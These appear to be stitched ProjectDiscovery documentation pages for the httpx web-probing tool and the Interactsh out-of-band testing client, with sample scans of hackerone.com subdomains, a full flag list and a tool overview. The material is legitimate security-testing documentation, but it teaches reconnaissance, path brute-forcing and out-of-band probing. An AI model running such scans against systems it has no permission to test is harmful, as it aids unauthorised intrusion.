/ /_ / /_/ /_____ | |/ /
/ __ \/ __/ __/ __ \| /
/ / / / /_/ /_/ /_/ / |
/_/ /_/\__/\__/ .___/_/|_|
/_/ v1.1.2
projectdiscovery.io
Use with caution. You are responsible for your actions
Developers assume no liability and are not responsible for any misuse or damage.
https://mta-sts.forwarding.hackerone.com
https://mta-sts.hackerone.com
https://mta-sts.managed.hackerone.com
https://www.hackerone.com
https://api.hackerone.com
https://gslink.hackerone.com
https://resources.hackerone.com
https://docs.hackerone.com
https://support.hackerone.com
```
### Error Page Classifier and Filtering
The Error Page Classifier and Filtering feature adds intelligence to `httpx` by enabling it to classify and filter out common error pages returned by web applications.
It is an enhancement geared towards reducing noise and helping focus on actual results.
Using the `-fep` or `-filter-error-page` option writes filtered error pages to the file `filtered_error_page.json` in JSON Lines format.
```
httpx -l urls.txt -path /v1/api -fep
__ __ __ _ __
/ /_ / /_/ /_____ | |/ /
/ __ \/ __/ __/ __ \| /
/ / / / /_/ /_/ /_/ / |
/_/ /_/\__/\__/ .___/_/|_|
/_/
projectdiscovery.io
[INF] Current httpx version v1.3.3 (latest)
https://scanme.sh/v1/api
```
### Favicon Hash
Extract and display the mmh3 hash of the '/favicon.ico' file from given targets.
```
subfinder -d hackerone.com -silent | httpx -favicon
__ __ __ _ __
/ /_ / /_/ /_____ | |/ /
/ __ \/ __/ __/ __ \| /
/ / / / /_/ /_/ /_/ / |
/_/ /_/\__/\__/ .___/_/|_|
/_/ v1.1.5
projectdiscovery.io
Use with caution. You are responsible for your actions.
Developers assume no liability and are not responsible for any misuse or damage.
https://docs.hackerone.com/favicon.ico [595148549]
https://hackerone.com/favicon.ico [595148549]
https://mta-sts.managed.hackerone.com/favicon.ico [-1700323260]
https://mta-sts.forwarding.hackerone.com/favicon.ico [-1700323260]
https://support.hackerone.com/favicon.ico [-1279294674]
https://gslink.hackerone.com/favicon.ico [1506877856]
https://resources.hackerone.com/favicon.ico [-1840324437]
https://api.hackerone.com/favicon.ico [566218143]
https://mta-sts.hackerone.com/favicon.ico [-1700323260]
https://www.hackerone.com/favicon.ico [778073381]
```
### File/Path Bruteforce
Use `httpx` with the `-path` option for efficient File/Path Bruteforcing. This feature allows probing specific paths across multiple URLs, uncovering response codes and revealing potentially vulnerable or unsecured endpoints in web applications.
```
httpx -l urls.txt -path /v1/api -sc
__ __ __ _ __
/ /_ / /_/ /_____ | |/ /
/ __ \/ __/ __/ __ \| /
/ / / / /_/ /_/ /_/ / |
/_/ /_/\__/\__/ .___/_/|_|
/_/ v1.1.5
projectdiscovery.io
Use with caution. You are responsible for your actions.
Developers assume no liability and are not responsible for any misuse or damage.
https://mta-sts.managed.hackerone.com/v1/api [404]
https://mta-sts.hackerone.com/v1/api [404]
https://mta-sts.forwarding.hackerone.com/v1/api [404]
https://docs.hackerone.com/v1/api [404]
https://api.hackerone.com/v1/api [401]
https://hackerone.com/v1/api [302]
https://support.hackerone.com/v1/api [404]
https://resources.hackerone.com/v1/api [301]
https://gslink.hackerone.com/v1/api [404]
http://www.hackerone.com/v1/api [301]
```
### File Input
Run `httpx` with the `-probe` flag against all the hosts in hosts.txt to return URLs with probed status.
```
httpx -list hosts.txt -silent -probe
http://ns.hackerone.com [FAILED]
https://docs.hackerone.com [SUCCESS]
https://mta-sts.hackerone.com [SUCCESS]
https://mta-sts.managed.hackerone.com [SUCCESS]
http://email.hackerone.com [FAILED]
https://mta-sts.forwarding.hackerone.com [SUCCESS]
http://links.hackerone.com [FAILED]
https://api.hackerone.com [SUCCESS]
https://www.hackerone.com [SUCCESS]
http://events.hackerone.com [FAILED]
https://support.hackerone.com [SUCCESS]
https://gslink.hackerone.com [SUCCESS]
http://o1.email.hackerone.com [FAILED]
http://info.hackerone.com [FAILED]
https://resources.hackerone.com [SUCCESS]
http://o2.email.hackerone.com [FAILED]
http://o3.email.hackerone.com [FAILED]
http://go.hackerone.com [FAILED]
http://a.ns.hackerone.com [FAILED]
http://b.ns.hackerone.com [FAILED]
```
### JARM Fingerprint
Use `httpx` with the `-jarm` flag to leverage JARM fingerprinting, a specialized tool for active TLS server fingerprinting.
This approach enables the identification and categorization of servers based on their TLS configurations, making it an effective method for detecting and analyzing diverse internet servers,
including potential security threats.
```
subfinder -d hackerone.com -silent | httpx -jarm
__ __ __ _ __
/ /_ / /_/ /_____ | |/ /
/ __ \/ __/ __/ __ \| /
/ / / / /_/ /_/ /_/ / |
/_/ /_/\__/\__/ .___/_/|_|
/_/ v1.2.1
projectdiscovery.io
Use with caution. You are responsible for your actions.
Developers assume no liability and are not responsible for any misuse or damage.
https://www.hackerone.com [29d3dd00029d29d00042d43d00041d5de67cc9954cc85372523050f20b5007]
https://mta-sts.hackerone.com [29d29d00029d29d00042d43d00041d2aa5ce6a70de7ba95aef77a77b00a0af]
https://mta-sts.managed.hackerone.com [29d29d00029d29d00042d43d00041d2aa5ce6a70de7ba95aef77a77b00a0af]
https://docs.hackerone.com [29d29d00029d29d00042d43d00041d2aa5ce6a70de7ba95aef77a77b00a0af]
https://support.hackerone.com [29d3dd00029d29d00029d3dd29d29d5a74e95248e58a6162e37847a24849f7]
https://api.hackerone.com [29d3dd00029d29d00042d43d00041d5de67cc9954cc85372523050f20b5007]
https://mta-sts.forwarding.hackerone.com [29d29d00029d29d00042d43d00041d2aa5ce6a70de7ba95aef77a77b00a0af]
https://resources.hackerone.com [2ad2ad0002ad2ad0002ad2ad2ad2ad043bfbd87c13813505a1b60adf4f6ff5]
```
### Tool Chain
Combining `httpx` with other tools like `subfinder` can elevate your web reconnaissance.
For example, pipe results from `subfinder` directly into `httpx` to efficiently identify active web servers and their technologies across various subdomains of a given target.
```
subfinder -d hackerone.com -silent| httpx -title -tech-detect -status-code
__ __ __ _ __
/ /_ / /_/ /_____ | |/ /
/ __ \/ __/ __/ __ \| /
/ / / / /_/ /_/ /_/ / |
/_/ /_/\__/\__/ .___/_/|_|
/_/ v1.1.1
projectdiscovery.io
Use with caution. You are responsible for your actions
Developers assume no liability and are not responsible for any misuse or damage.
https://mta-sts.managed.hackerone.com [404] [Page not found · GitHub Pages] [Varnish,GitHub Pages,Ruby on Rails]
https://mta-sts.hackerone.com [404] [Page not found · GitHub Pages] [Varnish,GitHub Pages,Ruby on Rails]
https://mta-sts.forwarding.hackerone.com [404] [Page not found · GitHub Pages] [GitHub Pages,Ruby on Rails,Varnish]
https://docs.hackerone.com [200] [HackerOne Platform Documentation] [Ruby on Rails,jsDelivr,Gatsby,React,webpack,Varnish,GitHub Pages]
https://support.hackerone.com [301,302,301,200] [HackerOne] [Cloudflare,Ruby on Rails,Ruby]
https://resources.hackerone.com [301,301,404] [Sorry, no Folders found.]
```
### URL probe
Run `httpx` against all the hosts and subdomains in hosts.txt to return URLs running an HTTP webserver.
```
cat hosts.txt | httpx
__ __ __ _ __
/ /_ / /_/ /_____ | |/ /
/ __ \/ __/ __/ __ \| /
/ / / / /_/ /_/ /_/ / |
/_/ /_/\__/\__/ .___/_/|_| v1.1.1
/_/
projectdiscovery.io
[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
https://mta-sts.managed.hackerone.com
https://mta-sts.hackerone.com
https://mta-sts.forwarding.hackerone.com
https://docs.hackerone.com
https://www.hackerone.com
https://resources.hackerone.com
https://api.hackerone.com
https://support.hackerone.com
```
## UI Dashboard (PDCP Integration)
#### Configure API Key
To upload your assets to PDCP you will need to create a free API Key
* **Obtain API Key:**
* Visit [https://cloud.projectdiscovery.io](https://cloud.projectdiscovery.io)
* Open the settings menu from the top right and select "API Key" to create your API key
* Use the `httpx -auth` command, and enter your API key when prompted.
#### Configure Team (Optional)
If you want to upload the asset results to a team workspace instead of your personal workspace, you can configure the Team ID. You can use either the CLI option or the environment variable, depending on your preference.
* **Obtain Team ID:**
* To obtain your Team ID, navigate to [https://cloud.projectdiscovery.io/settings/team](https://cloud.projectdiscovery.io/settings/team) and copy the Team ID from the top right section.
![image](https://github.com/user-attachments/assets/76a9f102-1626-4c87-8d9e-37c30417f19e)
* **CLI Option:**
* Use the `-tid` or `-team-id` option to specify the team ID.
* Example: `httpx -tid XXXXXX -dashboard`
* **ENV Variable:**
* Set the `PDCP_TEAM_ID` environment variable to your team ID.
* Example: `export PDCP_TEAM_ID=XXXXX`
Either of these options is sufficient to configure the Team ID.
#### Run httpx with UI Dashboard
To run `httpx` and upload the results to the UI Dashboard:
```console
$ chaos -d hackerone.com | httpx -dashboard
__ __ __ _ __
/ /_ / /_/ /_____ | |/ /
/ __ \/ __/ __/ __ \| /
/ / / / /_/ /_/ /_/ / |
/_/ /_/\__/\__/ .___/_/|_|
/_/
projectdiscovery.io
[INF] Current httpx version v1.6.6 (latest)
[INF] To view results on UI dashboard, visit https://cloud.projectdiscovery.io/assets upon completion.
http://a.ns.hackerone.com
https://www.hackerone.com
http://b.ns.hackerone.com
https://api.hackerone.com
https://mta-sts.forwarding.hackerone.com
https://docs.hackerone.com
https://support.hackerone.com
https://mta-sts.hackerone.com
https://gslink.hackerone.com
[INF] Found 10 results, View found results in dashboard : https://cloud.projectdiscovery.io/assets/cqd56lebh6us73bi22pg
```
![image](https://blog.projectdiscovery.io/content/images/size/w1600/2024/08/image.png)
#### Uploading to an Existing Asset Group
To upload new assets to an existing asset group:
```console
$ chaos -d hackerone.com | httpx -dashboard -aid existing-asset-id
```
#### Setting an Asset Group Name
To set a custom asset group name:
```console
$ chaos -d hackerone.com | httpx -dashboard -aname "Custom Asset Group"
```
### Additional upload options
* `-pd, -dashboard`: Enable uploading of `httpx` results to the ProjectDiscovery Cloud (PDCP) UI Dashboard.
* `-aid, -asset-id string`: Upload new assets to an existing asset ID (optional).
* `-aname, -asset-name string`: Set the asset group name (optional).
* `-pdu, -dashboard-upload string`: Upload `httpx` output file (jsonl) to the ProjectDiscovery Cloud (PDCP) UI Dashboard.
### Environment Variables
* `export ENABLE_CLOUD_UPLOAD=true`: Enable dashboard upload by default.
* `export DISABLE_CLOUD_UPLOAD_WARN=true`: Disable dashboard warning.
* `export PDCP_TEAM_ID=XXXXX`: Set the team ID for the ProjectDiscovery Cloud Platform.
## Expanded Examples
### Using httpx as a library
httpx can be used as a library by creating an instance of the Options struct and populating it with the same options that would be specified via the CLI.
Once validated, the struct should be passed to a runner instance (which should be closed at the end of the program), and the RunEnumeration method should be called.
* A basic example of how to use httpx as a library is available in the [GitHub examples](https://github.com/projectdiscovery/httpx/tree/main/examples) folder.
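Following that description, below is a condensed, illustrative sketch. It mirrors the shape of the upstream example (`runner.Options`, an `OnResult` callback, `ValidateOptions`, `runner.New`, `Close`, and `RunEnumeration`); field names such as `InputTargetHost` are taken from the upstream example and may differ between httpx versions, so treat this as a starting point rather than a definitive reference.

```go
package main

import (
	"log"

	"github.com/projectdiscovery/goflags"
	"github.com/projectdiscovery/httpx/runner"
)

func main() {
	// Populate the same options that would otherwise be passed via CLI flags.
	options := runner.Options{
		Methods:         "GET",
		InputTargetHost: goflags.StringSlice{"scanme.sh", "projectdiscovery.io"},
		// OnResult is invoked for every probed target.
		OnResult: func(r runner.Result) {
			if r.Err != nil {
				log.Printf("error for %s: %s", r.Input, r.Err)
				return
			}
			log.Printf("%s %s %d", r.Input, r.Host, r.StatusCode)
		},
	}

	// Validate the options before handing them to the runner.
	if err := options.ValidateOptions(); err != nil {
		log.Fatal(err)
	}

	httpxRunner, err := runner.New(&options)
	if err != nil {
		log.Fatal(err)
	}
	// Close the runner at the end of the program.
	defer httpxRunner.Close()

	httpxRunner.RunEnumeration()
}
```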
### Using httpx screenshot
httpx includes support for taking screenshots with the `-screenshot` flag, which captures target URLs, pages, or endpoints along with the rendered DOM.
This functionality enables a comprehensive view of the target's visual content.
Rendered DOM body is also included in json line output when `-screenshot` option is used with `-json` option.
To use this feature, add the `-screenshot` flag to the `httpx` command.
`httpx -screenshot -u https://example.com`
Screenshots are captured using a headless browser, and as a result `httpx` will be slower when using the `-screenshot` option.
#### Domain, Subdomain, and Path Support
The `-screenshot` option is versatile and can be used to capture screenshots for domains, subdomains, and even specific paths when used in conjunction with the `-path` option:
```
httpx -screenshot -u example.com
httpx -screenshot -u https://example.com/login
httpx -screenshot -path fuzz_path.txt -u https://example.com
```
#### Using with Other Tools
In the example below, we're piping `subfinder` output into `httpx` to take screenshots of the discovered subdomains.
```
subfinder -d example.com | httpx -screenshot
```
#### System Chrome Support
By default, `httpx` uses the go-rod library to install and manage Chrome for taking screenshots.
However, if you prefer to use your locally installed system Chrome, add the `-system-chrome` flag:
```
httpx -screenshot -system-chrome -u https://example.com
```
#### Output Directory
Screenshots are stored in the output/screenshot directory by default. To specify a custom output directory, use the `-srd` option:
```
httpx -screenshot -srd /path/to/custom/directory -u https://example.com
```
#### Body Preview
Body preview shows the first N characters of the response, with HTML tags stripped.
```
httpx -u https://example.com -silent -body-preview
https://example.com [Example Domain This domain is for use in illustrative examples in documents. You may use this domai]
```
```
httpx -u https://example.com -silent -body-preview=200 -strip=html
https://example.com [Example Domain This domain is for use in illustrative examples in documents. You may use this domain in literature without prior coordination or asking for permission. More information...]
```
# Httpx Usage
Source: https://docs.projectdiscovery.io/tools/httpx/usage
Learn httpx usage including flags, probes, and options
## Access help
Use `httpx -h` to display all help options.
## Httpx help options
```
Flags:
INPUT:
-l, -list string input file containing list of hosts to process
-rr, -request string file containing raw request
-u, -target string[] input target host(s) to probe
PROBES:
-sc, -status-code display response status-code
-cl, -content-length display response content-length
-ct, -content-type display response content-type
-location display response redirect location
-favicon display mmh3 hash for '/favicon.ico' file
-hash string display response body hash (supported: md5,mmh3,simhash,sha1,sha256,sha512)
-jarm display jarm fingerprint hash
-rt, -response-time display response time
-lc, -line-count display response body line count
-wc, -word-count display response body word count
-title display page title
-bp, -body-preview display first N characters of response body (default 100)
-server, -web-server display server name
-td, -tech-detect display technology in use based on wappalyzer dataset
-method display http request method
-websocket display server using websocket
-ip display host ip
-cname display host cname
-asn display host asn information
-cdn display cdn/waf in use
-probe display probe status
HEADLESS:
-ss, -screenshot enable saving screenshot of the page using headless browser
-system-chrome enable using local installed chrome for screenshot
-esb, -exclude-screenshot-bytes enable excluding screenshot bytes from json output
-ehb, -exclude-headless-body enable excluding headless header from json output
MATCHERS:
-mc, -match-code string match response with specified status code (-mc 200,302)
-ml, -match-length string match response with specified content length (-ml 100,102)
-mlc, -match-line-count string match response body with specified line count (-mlc 423,532)
-mwc, -match-word-count string match response body with specified word count (-mwc 43,55)
-mfc, -match-favicon string[] match response with specified favicon hash (-mfc 1494302000)
-ms, -match-string string match response with specified string (-ms admin)
-mr, -match-regex string match response with specified regex (-mr admin)
-mcdn, -match-cdn string[] match host with specified cdn provider (cloudfront, fastly, google, leaseweb, stackpath)
-mrt, -match-response-time string match response with specified response time in seconds (-mrt '< 1')
-mdc, -match-condition string match response with dsl expression condition
EXTRACTOR:
-er, -extract-regex string[] display response content with matched regex
-ep, -extract-preset string[] display response content matched by a pre-defined regex (ipv4,mail,url)
FILTERS:
-fc, -filter-code string filter response with specified status code (-fc 403,401)
-fep, -filter-error-page filter response with ML based error page detection
-fd, -filter-duplicates filter out near-duplicate responses (only first response is retained)
-fl, -filter-length string filter response with specified content length (-fl 23,33)
-flc, -filter-line-count string filter response body with specified line count (-flc 423,532)
-fwc, -filter-word-count string filter response body with specified word count (-fwc 423,532)
-ffc, -filter-favicon string[] filter response with specified favicon hash (-ffc 1494302000)
-fs, -filter-string string filter response with specified string (-fs admin)
-fe, -filter-regex string filter response with specified regex (-fe admin)
-fcdn, -filter-cdn string[] filter host with specified cdn provider (cloudfront, fastly, google, leaseweb, stackpath)
-frt, -filter-response-time string filter response with specified response time in seconds (-frt '> 1')
-fdc, -filter-condition string filter response with dsl expression condition
-strip strips all tags in response. supported formats: html,xml (default html)
RATE-LIMIT:
-t, -threads int number of threads to use (default 50)
-rl, -rate-limit int maximum requests to send per second (default 150)
-rlm, -rate-limit-minute int maximum number of requests to send per minute
MISCELLANEOUS:
-pa, -probe-all-ips probe all the ips associated with same host
-p, -ports string[] ports to probe (nmap syntax: eg http:1,2-10,11,https:80)
-path string path or list of paths to probe (comma-separated, file)
-tls-probe send http probes on the extracted TLS domains (dns_name)
-csp-probe send http probes on the extracted CSP domains
-tls-grab perform TLS(SSL) data grabbing
-pipeline probe and display server supporting HTTP1.1 pipeline
-http2 probe and display server supporting HTTP2
-vhost probe and display server supporting VHOST
-ldv, -list-dsl-variables list json output field keys name that support dsl matcher/filter
UPDATE:
-up, -update update httpx to latest version
-duc, -disable-update-check disable automatic httpx update check
OUTPUT:
-o, -output string file to write output results
-oa, -output-all filename to write output results in all formats
-sr, -store-response store http response to output directory
-srd, -store-response-dir string store http response to custom directory
-csv store output in csv format
-csvo, -csv-output-encoding string define output encoding
-j, -json store output in JSONL(ines) format
-irh, -include-response-header include http response (headers) in JSON output (-json only)
-irr, -include-response include http request/response (headers + body) in JSON output (-json only)
-irrb, -include-response-base64 include base64 encoded http request/response in JSON output (-json only)
-include-chain include redirect http chain in JSON output (-json only)
-store-chain include http redirect chain in responses (-sr only)
-svrc, -store-vision-recon-cluster include visual recon clusters (-ss and -sr only)
CONFIGURATIONS:
-config string path to the httpx configuration file (default $HOME/.config/httpx/config.yaml)
-r, -resolvers string[] list of custom resolver (file or comma separated)
-allow string[] allowed list of IP/CIDR's to process (file or comma separated)
-deny string[] denied list of IP/CIDR's to process (file or comma separated)
-sni, -sni-name string custom TLS SNI name
-random-agent enable Random User-Agent to use (default true)
-H, -header string[] custom http headers to send with request
-http-proxy, -proxy string http proxy to use (eg http://127.0.0.1:8080)
-unsafe send raw requests skipping golang normalization
-resume resume scan using resume.cfg
-fr, -follow-redirects follow http redirects
-maxr, -max-redirects int max number of redirects to follow per host (default 10)
-fhr, -follow-host-redirects follow redirects on the same host
-rhsts, -respect-hsts respect HSTS response headers for redirect requests
-vhost-input get a list of vhosts as input
-x string request methods to probe, use 'all' to probe all HTTP methods
-body string post body to include in http request
-s, -stream stream mode - start elaborating input targets without sorting
-sd, -skip-dedupe disable dedupe input items (only used with stream mode)
-ldp, -leave-default-ports leave default http/https ports in host header (eg. http://host:80 - https://host:443
-ztls use ztls library with autofallback to standard one for tls13
-no-decode avoid decoding body
-tlsi, -tls-impersonate enable experimental client hello (ja3) tls randomization
-no-stdin Disable Stdin processing
DEBUG:
-health-check, -hc run diagnostic check up
-debug display request/response content in cli
-debug-req display request content in cli
-debug-resp display response content in cli
-version display httpx version
-stats display scan statistic
-profile-mem string optional httpx memory profile dump file
-silent silent mode
-v, -verbose verbose mode
-si, -stats-interval int number of seconds to wait between showing a statistics update (default: 5)
-nc, -no-color disable colors in cli output
OPTIMIZATIONS:
-nf, -no-fallback display both probed protocol (HTTPS and HTTP)
-nfs, -no-fallback-scheme probe with protocol scheme specified in input
-maxhr, -max-host-error int max error count per host before skipping remaining path/s (default 30)
-ec, -exclude-cdn skip full port scans for CDN/WAF (only checks for 80,443)
-retries int number of retries
-timeout int timeout in seconds (default 10)
-delay value duration between each http request (eg: 200ms, 1s) (default -1ns)
-rsts, -response-size-to-save int max response size to save in bytes (default 2147483647)
-rstr, -response-size-to-read int max response size to read in bytes (default 2147483647)
```
## Notes on usage
* By default, an `httpx` probe with an HTTPS scheme will fall back to HTTP only if HTTPS is not reachable.
* The `-no-fallback` flag can be used to probe and display both HTTP and HTTPS result.
* Custom scheme for ports can be defined, for example `-ports http:443,http:80,https:8443`
* Custom resolvers support multiple protocols (doh|tcp|udp) in the form protocol:resolver:port (for example `udp:127.0.0.1:53`; see the example after these notes)
* The following flags should be used for specific use cases instead of running them as default with other probes:
* `-ports`
* `-path`
* `-vhost`
* `-screenshot`
* `-csp-probe`
* `-tls-probe`
* `-favicon`
* `-http2`
* `-pipeline`
* `-tls-impersonate`
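For example, an illustrative run that ties a few of these notes together, displaying both HTTP and HTTPS results while using a custom resolver:
```console
httpx -l hosts.txt -sc -title -nf -r udp:127.0.0.1:53
```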
# Open Source Tools
Source: https://docs.projectdiscovery.io/tools/index
Learn about ProjectDiscovery's Open Source Tools
Let's delve into the specifics of each category and its corresponding tools.
## Discover
In the discovery phase, the goal is to map out the target's entire online presence, finding subdomains, open ports, and other valuable endpoints. The tools in this category are instrumental in revealing a comprehensive view of the target's landscape. This stage includes tools like:
* **subfinder**: A robust tool focused on passive subdomain enumeration, providing a holistic view of a target's online assets.
* **cloudlist**: A comprehensive tool for enumerating assets across multiple cloud providers, ensuring visibility into the cloud-based infrastructure of your target.
* **naabu**: A lightning-fast port scanner designed to swiftly identify open ports on target hosts, ensuring no potential entry point is overlooked.
* **katana**: A next-generation web crawling framework designed to navigate and parse web content efficiently, revealing hidden details of web assets.
* **chaos**: Offering an internet-wide asset data source, Chaos is crucial for expanding the scope of your asset discovery efforts.
* **uncover**: Designed to search and highlight exposed hosts across various APIs, ensuring that no stone is left unturned in the discovery phase.
* **asnmap**: Quickly map an organization's network ranges using autonomous system number (ASN) information.
* **alterx**: A fast and customizable subdomain wordlist generator using DSL.
* **shuffledns**: A massDNS wrapper to bruteforce and resolve subdomains with wildcard handling support.
## Enrich
Once assets are discovered, the next step is to enrich the gathered data. This phase involves understanding the nature of the assets, the technologies behind them, and their exposure level. This stage includes tools like:
* **httpx**: An essential HTTP toolkit that probes services, identifying crucial details about web servers, status codes, and other valuable metadata.
* **dnsx**: A versatile DNS toolkit that allows for efficient operations such as mass DNS resolutions, wildcard testing, and more.
* **tlsx**: Specialized for TLS-based data collection, tlsx offers insights into certificates, cipher suites, and other SSL/TLS details of a target.
## Detect
With the landscape mapped and details enriched, the next phase is detection. Here, the aim is to pinpoint exploitable vulnerabilities, ensuring a thorough risk assessment. This stage includes tools like:
* **nuclei**: A vulnerability scanner designed to identify exploitable weaknesses in the attack surface, with a vast library of templates for various known vulnerabilities.
* **interactsh**: An out-of-band (OOB) interaction gathering library, essential for identifying vulnerabilities that may not be immediately evident through conventional scanning methods.
* **cvemap**: Navigate the Common Vulnerabilities and Exposures (CVE) jungle with ease using cvemap, a CLI tool designed to provide a structured and easily navigable interface to various vulnerability databases.
* **notify**: Streamlining the workflow, Notify allows users to stream the output of various tools to multiple platforms, ensuring real-time updates and alerts.
## Utilities
These utilities can be combined with our other tooling based on the [Unix philosophy](https://blog.projectdiscovery.io/how-projectdiscovery-applies-the-unix-philosophy-to-their-tools/) to create pipelines and customize your offensive security or bug bounty hunting program.
* **pdtm**: A simple and easy-to-use tool for managing all of the open source projects from ProjectDiscovery.
* **mapcidr**: A utility program to perform multiple operations for given subnet/CIDR ranges.
* **cdncheck**: A utility to detect various technologies for a given DNS / IP address.
* **aix**: A CLI tool to interact with Large Language Models (LLM) APIs.
* **proxify**: A Swiss Army Knife proxy for rapid deployments.
* **simplehttpserver**: A Go-enhanced version of the well-known Python SimpleHTTPServer.
***
Dive into the individual tool's documentation to explore in-depth functionalities, usage examples, and best practices. Your journey into enhanced offensive security starts here!
# Interactsh Install
Source: https://docs.projectdiscovery.io/tools/interactsh/install
Learn how to install Interactsh and get started
Enter the command below in a terminal to install ProjectDiscovery's Interactsh.
```bash
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest
```
## Installation Notes
* The Interactsh CLI client requires the latest version of [**Go**](https://go.dev/doc/install)
# Interactsh Integrations
Source: https://docs.projectdiscovery.io/tools/interactsh/integrations
Learn about integrating interactsh with other tools
## Burp Suite Extension
[interactsh-collaborator](https://github.com/wdahlenburg/interactsh-collaborator) is a Burp Suite extension developed and maintained by [@wdahlenb](https://twitter.com/wdahlenb)
* Download latest JAR file from [releases](https://github.com/wdahlenburg/interactsh-collaborator/releases) page.
* Open Burp Suite → Extender → Add → Java → Select JAR file → Next
* A new tab named **Interactsh** will appear upon successful installation.
* See the [interactsh-collaborator](https://github.com/wdahlenburg/interactsh-collaborator) project for more info.
![image](https://user-images.githubusercontent.com/8293321/135176099-0e3fa01c-bdce-4f04-a94f-de0a34c7abf6.png)
## ZAP Add-On
Interactsh can be used with OWASP ZAP via the [OAST add-on for ZAP](https://www.zaproxy.org/docs/desktop/addons/oast-support/). With ZAP's scripting capabilities, you can create powerful out-of-band scan rules that leverage Interactsh's features. A standalone script template has been provided as an example (it is added automatically when you install the add-on).
* Install the OAST add-on from the [ZAP Marketplace](https://www.zaproxy.org/addons/).
* Go to Tools → Options → OAST and select **Interactsh**.
* Configure [the options](https://www.zaproxy.org/docs/desktop/addons/oast-support/services/interactsh/options/) for the client and click on "New Payload" to generate a new payload.
* OOB interactions will appear in the [OAST Tab](https://www.zaproxy.org/docs/desktop/addons/oast-support/tab/) and you can click on any of them to view the full request and response.
* You can set Interactsh as the default for ActiveScan in the `Options` > `OAST` > `General` menu.
* When checking the `Use Permanent Database` option, you can review interactions that occurred after ZAP was terminated.
* See the [OAST add-on documentation](https://www.zaproxy.org/docs/desktop/addons/oast-support/) for more info.
![zap](https://user-images.githubusercontent.com/16446369/135211920-ed24ba5a-5547-4cd4-b6d8-656af9592c20.png)
*Interactsh in ZAP*
# Interactsh Overview
Source: https://docs.projectdiscovery.io/tools/interactsh/overview
A tool for detecting out-of-band vulnerabilities
**Interactsh** is an open-source tool developed by ProjectDiscovery for detecting [out-of-band (OOB) vulnerabilities](https://portswigger.net/burp/application-security-testing/oast). These are vulnerabilities that may not be identified using conventional tools or methods. Interactsh operates by generating dynamic URLs. When these URLs are requested by a target, they trigger a callback. This callback can then be monitored and analyzed to identify potential vulnerabilities in the target.
Check out [our blog introducing Interactsh](https://blog.projectdiscovery.io/interactsh-release/) and [view the repo here](https://github.com/projectdiscovery/interactsh).
# Features
* DNS/HTTP(S)/SMTP(S)/LDAP Interaction
* CLI / Web / Burp / ZAP / Docker client
* AES encryption with zero logging
* Automatic ACME based Wildcard TLS w/ Auto Renewal
* DNS Entries for Cloud Metadata service
* Dynamic HTTP Response control
* Self-Hosted Interactsh Server
* Multiple domain support **(self-hosted)**
* NTLM/SMB/FTP/RESPONDER Listener **(self-hosted)**
* Wildcard / Protected Interactions **(self-hosted)**
* Customizable Index / File hosting **(self-hosted)**
* Customizable Payload Length **(self-hosted)**
* Custom SSL Certificate **(self-hosted)**
## Client & Server
The Interactsh tool comprises two main components: [`interactsh-client`](/tools/interactsh/running) and [`interactsh-server`](/tools/interactsh/server). Each plays a critical role in the process of detecting out-of-band vulnerabilities, but they operate in distinct manners and serve different purposes.
### Interactsh Server
* Function: Captures and records callbacks from interaction URLs.
* Deployment: Hosted publicly to receive requests from tested systems.
* Use Case: Ideal for those hosting their instance for privacy or control.
ProjectDiscovery maintains a number of [publicly accessible Interactsh servers](/tools/interactsh/running#projectdiscovery-interactsh-servers) that you can use, so you only need to run the client for your specific use case. Alternatively, you can [self-host your own Interactsh server](/tools/interactsh/running#self-hosted-interactsh-server) if you want it to run on your custom domain or you need more control over the server-side interactions.
### Interactsh Client
* Function: Generates URLs for testing, retrieves interaction logs from the server.
* Deployment: Runs locally for managing URLs and analyzing captured data.
* Use Case: Used by testers to create and analyze tests for out-of-band vulnerabilities.
## Support
Questions about using Interactsh? Issues working through installation? Cool story or use case you want to share? Get in touch!
Check out the [Help](/help) section of the docs or reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
# Running Interactsh interactsh-client
Source: https://docs.projectdiscovery.io/tools/interactsh/running
Learn about running Interactsh with examples and detailed output
For all of the flags and options available for **Interactsh** be sure to check out the [Usage](/tools/interactsh/usage) page.
If you have questions, reach out to us through [Help](/help).
## Basic Usage
The `interactsh-client` command generates a unique payload that can be used for out-of-band (OOB) testing, with minimal interaction information in the output.
```console
interactsh-client
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/ v0.0.5
projectdiscovery.io
[INF] Listing 1 payload for OOB Testing
[INF] c23b2la0kl1krjcrdj10cndmnioyyyyyn.oast.pro
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received DNS interaction (A) from 172.253.226.100 at 2021-26-26 12:26
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received DNS interaction (AAAA) from 32.3.34.129 at 2021-26-26 12:26
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received HTTP interaction from 43.22.22.50 at 2021-26-26 12:26
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received DNS interaction (MX) from 43.3.192.3 at 2021-26-26 12:26
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received DNS interaction (TXT) from 74.32.183.135 at 2021-26-26 12:26
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received SMTP interaction from 32.85.166.50 at 2021-26-26 12:26
```
## Session File
`interactsh-client` with the `-sf, -session-file` flag can be used to store/read the current session information from a user-defined file. This functionality is useful for resuming the same session to poll interactions even after the client has been stopped or closed.
```console
interactsh-client -sf interact.session
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/ 1.0.3
projectdiscovery.io
[INF] Listing 1 payload for OOB Testing
[INF] c23b2la0kl1krjcrdj10cndmnioyyyyyn.oast.pro
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received DNS interaction (A) from 172.253.226.100 at 2021-26-26 12:26
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received DNS interaction (AAAA) from 32.3.34.129 at 2021-26-26 12:26
